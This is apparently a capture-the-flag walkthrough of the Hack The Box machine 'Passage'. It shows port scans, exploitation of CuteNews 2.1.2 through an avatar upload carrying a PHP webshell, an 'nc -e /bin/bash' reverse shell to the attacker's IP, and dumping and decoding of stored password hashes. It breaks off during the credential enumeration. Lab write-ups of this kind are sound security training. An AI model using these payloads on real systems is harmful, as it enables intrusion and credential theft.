I"Zﬂ<blockquote>
  <p>Passage starts off with web enumeration where we discover the website running on a vulnerable instance of CuteNews CMS and exploit it through bypassing Avatar Image Upload functionality to drop a PHP Web shell thereby gaining RCE. Next we recover password hashes from PHP serialized data stored in base64 encoded format, crack them and gain access to next user which shares an SSH key with another user on the box. For elevating privileges to root we exploit a bug in USBCreator D-Bus interface which allows us read/write files as root.</p>
</blockquote>

<h2 id="reconnaissance">Reconnaissance</h2>

<p>Initial enumeration reveals two TCP open ports 22, 80 :</p>

<h4 id="masscan">masscan</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí masscan <span class="nt">-e</span> tun0 <span class="nt">-p1-65535</span> <span class="nt">--rate</span> 500 10.10.10.206 | <span class="nb">tee </span>masscan.ports

Starting masscan 1.0.5 <span class="o">(</span>http://bit.ly/14GZzcT<span class="o">)</span> at 2020-11-17 07:31:11 GMT
 <span class="nt">--</span> forced options: <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-n</span> <span class="nt">--randomize-hosts</span> <span class="nt">-v</span> <span class="nt">--send-eth</span>
Initiating SYN Stealth Scan
Scanning 1 hosts <span class="o">[</span>65535 ports/host]
Discovered open port 80/tcp on 10.10.10.206
Discovered open port 22/tcp on 10.10.10.206

cfx:  ~/Documents/htb/passage
‚Üí <span class="nb">cat </span>masscan.ports | <span class="nb">grep </span>tcp | <span class="nb">sed </span>s<span class="s1">'/Discovered open port //'</span> | <span class="nb">awk</span> <span class="nt">-F</span>/ <span class="s1">'{print $1}'</span> <span class="nv">ORS</span><span class="o">=</span><span class="s1">','</span>
80,22,
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="nmap">nmap</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p22</span>,80 10.10.10.206
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-11-17 13:12 IST
Nmap scan report <span class="k">for </span>10.10.10.206
Host is up <span class="o">(</span>0.084s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 <span class="o">(</span>RSA<span class="o">)</span>
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Passage News
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>12.74 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Port Scan Summary :</p>

<ul>
  <li>Port 22 - SSH</li>
  <li>Port 80 - HTTP Website</li>
</ul>

<h3 id="port-80---http-website">Port 80 - HTTP Website</h3>

<p>Website looks like an blog designed to Publish news:</p>

<p><img src="/assets/img/Posts/Passage/website.png" alt="website" /></p>

<p>Looking at the top post, it appears they have implemented Fail2ban which prohibits us from brute-forcing the site for directory fuzzing or other kind of stuff, hence we‚Äôll skip <code class="language-plaintext highlighter-rouge">ffuf</code> and move ahead.</p>

<blockquote>
  <p>Fail2Ban is an intrusion prevention software framework that protects computer servers from brute-force attacks.</p>
</blockquote>

<p>At the bottom of the page we see the site is <code class="language-plaintext highlighter-rouge">Powered by CuteNews</code>, while searching for CuteNews I came across this <a href="https://cutephp.com/cutenews/readme.html"><strong>README</strong></a> which says after installation the CMS is located at <a href="http://yoursite.com/cutenews/index.php">http://yoursite.com/cutenews/index.php</a> similarly visiting <a href="http://10.10.10.206/CuteNews/index.php">http://10.10.10.206/CuteNews/index.php</a> brings us to CuteNews login page:</p>

<p><img src="/assets/img/Posts/Passage/login.png" alt="login" /></p>

<p>Here we can see it‚Äôs running CuteNews - 2.1.2</p>

<h2 id="shell-as-www-data">Shell as www-data</h2>

<h3 id="cutenews---exploit">CuteNews - Exploit</h3>

<p><code class="language-plaintext highlighter-rouge">searchsploit</code> output shows there is a Metasploit RCE available for version 2.1.2.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí searchsploit CuteNews 2.1.2
<span class="nt">------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
 Exploit Title                                                                                                                                              |  Path
<span class="nt">------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
CuteNews 2.1.2 - <span class="s1">'avatar'</span> Remote Code Execution <span class="o">(</span>Metasploit<span class="o">)</span>                                                                                                | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                                                                                                                    | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload                                                                                                        | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution                                                                                                                      | php/webapps/48800.py
<span class="nt">------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
Shellcodes: No Results
Papers: No Results
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The python exploit <code class="language-plaintext highlighter-rouge">48800.py</code> was published 5 days after the box was released so rather than jumping onto it, we‚Äôll understand the RCE using the intented method by going through Metasploit exploit.</p>

<h3 id="exploit-analysis">Exploit Analysis</h3>

<p>Looking at the Metasploit module description:</p>

<blockquote>
  <p>This module exploits a command execution vulnerability in CuteNews prior to 2.1.2.
The attacker can infiltrate the server through the avatar upload process in the profile area.
There is no realistic control of the $imgsize function in ‚Äú/core/modules/dashboard.php‚Äù
Header content of the file can be changed and the control can be bypassed.
We can use the ‚ÄúGIF‚Äù header for this process.
An ordinary user is enough to exploit the vulnerability. No need for admin user.
The module creates a file for you and allows RCE</p>
</blockquote>

<p><code class="language-plaintext highlighter-rouge">upload_shell</code> function:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre>  <span class="k">def</span> <span class="nf">upload_shell</span><span class="p">(</span><span class="n">cookie</span><span class="p">,</span> <span class="n">check</span><span class="p">)</span>

    <span class="n">res</span> <span class="o">=</span> <span class="n">send_request_cgi</span><span class="p">({</span>
      <span class="s1">'method'</span>   <span class="o">=&gt;</span> <span class="s1">'GET'</span><span class="p">,</span>
      <span class="s1">'uri'</span>      <span class="o">=&gt;</span> <span class="n">normalize_uri</span><span class="p">(</span><span class="n">target_uri</span><span class="p">.</span><span class="nf">path</span><span class="p">,</span> <span class="s2">"index.php?mod=main&amp;opt=personal"</span><span class="p">),</span>
      <span class="s1">'cookie'</span>   <span class="o">=&gt;</span> <span class="n">cookie</span>
    <span class="p">})</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>It appears the shell is being uploaded at the endpoint <code class="language-plaintext highlighter-rouge">/CuteNews/index.php?mod=main&amp;opt=personal</code> by uploading a new Avatar with .php extension containing the shell and then executing the shell by visiting the Avatar URL.</p>

<h3 id="autoexploit---python-rce">AutoExploit - Python RCE</h3>

<p>The Python script is pretty straightforward which drops us a webshell:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí python3 48800.py



           _____     __      _  __                     ___   ___  ___
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | &lt;  / |_  |
         / /__/ // / __/ <span class="nt">-_</span><span class="o">)</span>    / <span class="nt">-_</span><span class="o">)</span> |/|/ <span class="o">(</span>_-&lt;      / __/_ / / / __/
         <span class="se">\_</span>__/<span class="se">\_</span>,_/<span class="se">\_</span>_/<span class="se">\_</span>_/_/|_/<span class="se">\_</span>_/|__,__/___/     /____<span class="o">(</span>_<span class="o">)</span>_<span class="o">(</span>_<span class="o">)</span>____/
                                ___  _________
                               / _ <span class="se">\/</span> ___/ __/
                              / , _/ /__/ _/
                             /_/|_|<span class="se">\_</span>__/___/




<span class="o">[</span>-&gt;] Usage python3 expoit.py

Enter the URL&gt; http://10.10.10.206
<span class="o">================================================================</span>
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
<span class="o">================================================================</span>
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
<span class="o">================================================================</span>

<span class="o">=============================</span>
Registering a <span class="nb">users</span>
<span class="o">=============================</span>
<span class="o">[</span>+] Registration successful with username: 6Jd1qfOvZG and password: 6Jd1qfOvZG

<span class="o">=======================================================</span>
Sending Payload
<span class="o">=======================================================</span>
signature_key: 28e86c738babfbf544fa6f85798f4604-6Jd1qfOvZG
signature_dsi: 2bdb70bfb5c5efb697ca18ea4a74007d
logged <span class="k">in </span>user: 6Jd1qfOvZG
<span class="o">============================</span>
Dropping to a SHELL
<span class="o">============================</span>

<span class="nb">command</span> <span class="o">&gt;</span> <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>

<span class="nb">command</span> <span class="o">&gt;</span> <span class="nb">whoami
</span>www-data
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="manual-exploitation">Manual Exploitation</h3>

<h4 id="step-1-registration">Step 1: Registration</h4>

<p>Going back to <a href="http://10.10.10.206/CuteNews/index.php">http://10.10.10.206/CuteNews/index.php</a> we can use the register option to create an account:</p>

<p><img src="/assets/img/Posts/Passage/register.png" alt="register" /></p>

<p>Once registered &amp; logged in we are redirected to the profile page:</p>

<p><img src="/assets/img/Posts/Passage/logged.png" alt="logged" /></p>

<h4 id="step-2-crafting-avatar">Step 2: Crafting Avatar</h4>

<p>Personal options button brings us to the <code class="language-plaintext highlighter-rouge">index.php?mod=main&amp;opt=personal</code> which is the same endpoint as we saw in Metasploit exploit:</p>

<p><img src="/assets/img/Posts/Passage/personal.png" alt="personal" /></p>

<p>Getting a sample jpg image from <a href="https://file-examples.com/index.php/sample-images-download/sample-jpg-download/">https://file-examples.com/index.php/sample-images-download/sample-jpg-download/</a> and using <code class="language-plaintext highlighter-rouge">exiftool</code> to inject php webshell in comments section of the image:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>‚Üí exiftool <span class="nt">-comment</span><span class="o">=</span><span class="s1">'&lt;?php echo SYSTEM($_GET['</span>cfx<span class="s1">']); ?&gt;'</span> cold.jpg
    1 image files updated

cfx:  ~/Documents/htb/passage
‚Üí strings cold.jpg | <span class="nb">grep </span>php
<span class="c">#&lt;?php echo SYSTEM($_GET[cfx]); ?&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now we‚Äôll rename our jpg and append a .php extension which will confuse the site to accept it as a jpg at the same time process the image as PHP file, we could also intercept the request in burp and change the file extension to cold.php and still the site would accept &amp; upload the avatar:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí <span class="nb">mv </span>cold.jpg cold.jpg.php
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="step-3-upload-avatar">Step 3: Upload Avatar</h4>

<p>Once uploaded, we can see the avatar is now broken and is not rendering the image:</p>

<p><img src="/assets/img/Posts/Passage/avatar.png" alt="avatar" /></p>

<h4 id="step-4-triggering-php-webshell">Step 4: Triggering PHP WebShell</h4>

<p>Right click the Avatar -&gt; View Image brings us to the Avatar location <a href="http://passage.htb/CuteNews/uploads/avatar_cfx_cold.jpg.php">http://passage.htb/CuteNews/uploads/avatar_cfx_cold.jpg.php</a>, we can add <code class="language-plaintext highlighter-rouge">passage.htb</code> to <code class="language-plaintext highlighter-rouge">/etc/hosts</code> and the Image contents are now visible:</p>

<p>Adding our WebShell parameter and visiting the URL <a href="http://passage.htb/CuteNews/uploads/avatar_cfx_cold.jpg.php?cfx=id">http://passage.htb/CuteNews/uploads/avatar_cfx_cold.jpg.php?cfx=id</a></p>

<p><img src="/assets/img/Posts/Passage/rce.png" alt="rce" /></p>

<p>Bingo ! We have the RCE ready.</p>

<h4 id="step-5--getting-reverse-shell">Step 5:  Getting Reverse Shell</h4>

<p>Sending Reverse shell payload <a href="http://passage.htb/CuteNews/uploads/avatar_cfx_cold.jpg.php?cfx=nc -e /bin/bash 10.10.14.20 8020">http://passage.htb/CuteNews/uploads/avatar_cfx_cold.jpg.php?cfx=nc -e /bin/bash 10.10.14.20 8020</a></p>

<p>Getting a callback on <code class="language-plaintext highlighter-rouge">nc</code> listener:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí nc <span class="nt">-lvnp</span> 8020
Ncat: Version 7.91 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 10.10.10.206.
Ncat: Connection from 10.10.10.206:45416.
<span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
<span class="nb">whoami
</span>www-data
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Upgrading to a full TTY:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre>python3 <span class="nt">-c</span> <span class="s2">"import pty;pty.spawn('/bin/bash')"</span>
www-data@passage:/var/www/html/CuteNews/uploads<span class="nv">$ </span><span class="nb">ls
ls
</span>avatar_cfx_cold.jpg.php  avatar_egre55_ykxnacpt.php  avatar_hacker_jpyoyskt.php
www-data@passage:/var/www/html/CuteNews/uploads<span class="nv">$ </span><span class="nb">stty </span>rows 44
<span class="nb">stty </span>rows 44
www-data@passage:/var/www/html/CuteNews/uploads<span class="nv">$ </span><span class="nb">stty </span>columns 190
<span class="nb">stty </span>columns 190
www-data@passage:/var/www/html/CuteNews/uploads<span class="nv">$ </span><span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
<span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
www-data@passage:/var/www/html/CuteNews/uploads<span class="nv">$ </span>^Z
<span class="o">[</span>1]+  Stopped                 nc <span class="nt">-lvnp</span> 8020

cfx:  ~/Documents/htb/passage
‚Üí <span class="nb">stty </span>raw <span class="nt">-echo</span>

cfx:  ~/Documents/htb/passage
‚Üí nc <span class="nt">-lvnp</span> 8020

www-data@passage:/var/www/html/CuteNews/uploads<span class="nv">$ </span><span class="nb">ls
</span>avatar_cfx_cold.jpg.php  avatar_egre55_ykxnacpt.php  avatar_hacker_jpyoyskt.php
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="elevating-priv-www-data---paul">Elevating Priv: www-data -&gt; paul</h2>

<h3 id="enumeration">Enumeration</h3>

<p>Discovering troll files inside cdata:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td> --><td class="rouge-code"><pre>www-data@passage:/var/www/html/CuteNews/cdata<span class="nv">$ </span><span class="nb">ls
</span>Default.tpl    auto_archive.db.php  cache            comments.txt  confirmations.php  flood.txt       ipban.db.php  news.txt    postponed_news.txt  rss_config.php       <span class="nb">users
</span>Headlines.tpl  backup               cat.num.php      conf.php      csrf.php           idnews.db.php   log           newsid.txt  replaces.php        template             users.db.php
archives       btree                category.db.php  config.php    flood.db.php       installed.mark  news          plugins     rss.tpl             unapproved_news.txt  users.txt
www-data@passage:/var/www/html/CuteNews/cdata<span class="nv">$ </span><span class="nb">cat </span>users.db.php
&lt;?php die<span class="o">(</span><span class="s2">"You don't have access to open this file!"</span><span class="o">)</span><span class="p">;</span> ?&gt;
www-data@passage:/var/www/html/CuteNews/cdata<span class="nv">$ </span><span class="nb">cat </span>users.txt
qc4fs7:1
qc4fxg:2
qc4fyp:3
qc4fzh:3
qfwgzt:4
qfy7jk:4
qppjyv:4
qppl2w:4
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="fetching-password-hashes">Fetching Password Hashes</h3>

<p>Inside <code class="language-plaintext highlighter-rouge">/cdata/users</code> directory we find multiple php files containing base64 encoded data:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td> --><td class="rouge-code"><pre>www-data@passage:/var/www/html/CuteNews/cdata/users<span class="nv">$ </span><span class="nb">cat </span>lines
&lt;?php die<span class="o">(</span><span class="s1">'Direct call - access denied'</span><span class="o">)</span><span class="p">;</span> ?&gt;
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
&lt;?php die<span class="o">(</span><span class="s1">'Direct call - access denied'</span><span class="o">)</span><span class="p">;</span> ?&gt;
<span class="nv">YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0</span><span class="o">=</span>
&lt;?php die<span class="o">(</span><span class="s1">'Direct call - access denied'</span><span class="o">)</span><span class="p">;</span> ?&gt;
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
<span class="o">[</span>..SNIP..]
www-data@passage:/var/www/html/CuteNews/cdata/users<span class="nv">$ </span><span class="nb">cat </span>07.php
&lt;?php die<span class="o">(</span><span class="s1">'Direct call - access denied'</span><span class="o">)</span><span class="p">;</span> ?&gt;
<span class="nv">YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6IkQzSVJSdFc0WWRAaGFjay5tZSI7czoxMDoiRDNJUlJ0VzRZZCI7fX0</span><span class="o">=</span>
www-data@passage:/var/www/html/CuteNews/cdata/users<span class="nv">$ </span><span class="nb">cat </span>0a.php
&lt;?php die<span class="o">(</span><span class="s1">'Direct call - access denied'</span><span class="o">)</span><span class="p">;</span> ?&gt;
<span class="nv">YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0</span><span class="o">=</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Instead of going through each file, we‚Äôll make use of <code class="language-plaintext highlighter-rouge">grep</code> and some bash functions to sort out this data:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre>www-data@passage:/var/www/html/CuteNews/cdata/users<span class="nv">$ </span><span class="nb">cat</span> <span class="k">*</span> | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'php die'</span>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
<span class="nv">YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0</span><span class="o">=</span>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
<span class="nv">YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0</span><span class="o">=</span>
<span class="nv">YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0</span><span class="o">=</span>
<span class="nv">YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ</span><span class="o">==</span>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
<span class="nv">YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ</span><span class="o">==</span>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6
<span class="o">[</span>..SNIP..]
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Looks like these files are containing base64 encoded data, Next we‚Äôll decode the data line by line</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td> --><td class="rouge-code"><pre>www-data@passage:/var/www/html/CuteNews/cdata/users<span class="nv">$ </span><span class="nb">cat</span> <span class="k">*</span> | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'php die'</span> | <span class="k">while </span><span class="nb">read </span>line<span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="nv">$line</span> | <span class="nb">base64</span> <span class="nt">-d</span><span class="p">;</span> <span class="nb">echo</span><span class="p">;</span> <span class="k">done
</span>a:1:<span class="o">{</span>s:5:<span class="s2">"email"</span><span class="p">;</span>a:1:<span class="o">{</span>s:16:<span class="s2">"paul@passage.htb"</span><span class="p">;</span>s:10:<span class="s2">"paul-coles"</span><span class="p">;</span><span class="o">}}</span>
a:1:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>a:1:<span class="o">{</span>i:1598829833<span class="p">;</span>s:6:<span class="s2">"egre55"</span><span class="p">;</span><span class="o">}}</span>
a:1:<span class="o">{</span>s:5:<span class="s2">"email"</span><span class="p">;</span>a:1:<span class="o">{</span>s:15:<span class="s2">"egre55@test.com"</span><span class="p">;</span>s:6:<span class="s2">"egre55"</span><span class="p">;</span><span class="o">}}</span>
a:1:<span class="o">{</span>s:4:<span class="s2">"name"</span><span class="p">;</span>a:1:<span class="o">{</span>s:5:<span class="s2">"admin"</span><span class="p">;</span>a:8:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>s:10:<span class="s2">"1592483047"</span><span class="p">;</span>s:4:<span class="s2">"name"</span><span class="p">;</span>s:5:<span class="s2">"admin"</span><span class="p">;</span>s:3:<span class="s2">"acl"</span><span class="p">;</span>s:1:<span class="s2">"1"</span><span class="p">;</span>s:5:<span class="s2">"email"</span><span class="p">;</span>s:17:<span class="s2">"nadav@passage.htb"</span><span class="p">;</span>s:4:<span class="s2">"pass"</span><span class="p">;</span>s:64:<span class="s2">"7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1"</span><span class="p">;</span>s:3:<span class="s2">"lts"</span><span class="p">;</span>s:10:<span class="s2">"1592487988"</span><span class="p">;</span>s:3:<span class="s2">"ban"</span><span class="p">;</span>s:1:<span class="s2">"0"</span><span class="p">;</span>s:3:<span class="s2">"cnt"</span><span class="p">;</span>s:1:<span class="s2">"2"</span><span class="p">;</span><span class="o">}}}</span>
a:1:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>a:1:<span class="o">{</span>i:1592483281<span class="p">;</span>s:9:<span class="s2">"sid-meier"</span><span class="p">;</span><span class="o">}}</span>
a:1:<span class="o">{</span>s:5:<span class="s2">"email"</span><span class="p">;</span>a:1:<span class="o">{</span>s:17:<span class="s2">"nadav@passage.htb"</span><span class="p">;</span>s:5:<span class="s2">"admin"</span><span class="p">;</span><span class="o">}}</span>
a:1:<span class="o">{</span>s:5:<span class="s2">"email"</span><span class="p">;</span>a:1:<span class="o">{</span>s:15:<span class="s2">"kim@example.com"</span><span class="p">;</span>s:9:<span class="s2">"kim-swift"</span><span class="p">;</span><span class="o">}}</span>
a:1:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>a:1:<span class="o">{</span>i:1592483236<span class="p">;</span>s:10:<span class="s2">"paul-coles"</span><span class="p">;</span><span class="o">}}</span>
a:1:<span class="o">{</span>s:4:<span class="s2">"name"</span><span class="p">;</span>a:1:<span class="o">{</span>s:9:<span class="s2">"sid-meier"</span><span class="p">;</span>a:9:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>s:10:<span class="s2">"1592483281"</span><span class="p">;</span>s:4:<span class="s2">"name"</span><span class="p">;</span>s:9:<span class="s2">"sid-meier"</span><span class="p">;</span>s:3:<span class="s2">"acl"</span><span class="p">;</span>s:1:<span class="s2">"3"</span><span class="p">;</span>s:5:<span class="s2">"email"</span><span class="p">;</span>s:15:<span class="s2">"sid@example.com"</span><span class="p">;</span>s:4:<span class="s2">"nick"</span><span class="p">;</span>s:9:<span class="s2">"Sid Meier"</span><span class="p">;</span>s:4:<span class="s2">"pass"</span><span class="p">;</span>s:64:<span class="s2">"4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88"</span><span class="p">;</span>s:3:<span class="s2">"lts"</span><span class="p">;</span>s:10:<span class="s2">"1592485645"</span><span class="p">;</span>s:3:<span class="s2">"ban"</span><span class="p">;</span>s:1:<span class="s2">"0"</span><span class="p">;</span>s:3:<span class="s2">"cnt"</span><span class="p">;</span>s:1:<span class="s2">"2"</span><span class="p">;</span><span class="o">}}}</span>
a:1:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>a:1:<span class="o">{</span>i:1592483047<span class="p">;</span>s:5:<span class="s2">"admin"</span><span class="p">;</span><span class="o">}}</span>
a:1:<span class="o">{</span>s:5:<span class="s2">"email"</span><span class="p">;</span>a:1:<span class="o">{</span>s:15:<span class="s2">"sid@example.com"</span><span class="p">;</span>s:9:<span class="s2">"sid-meier"</span><span class="p">;</span><span class="o">}}</span>
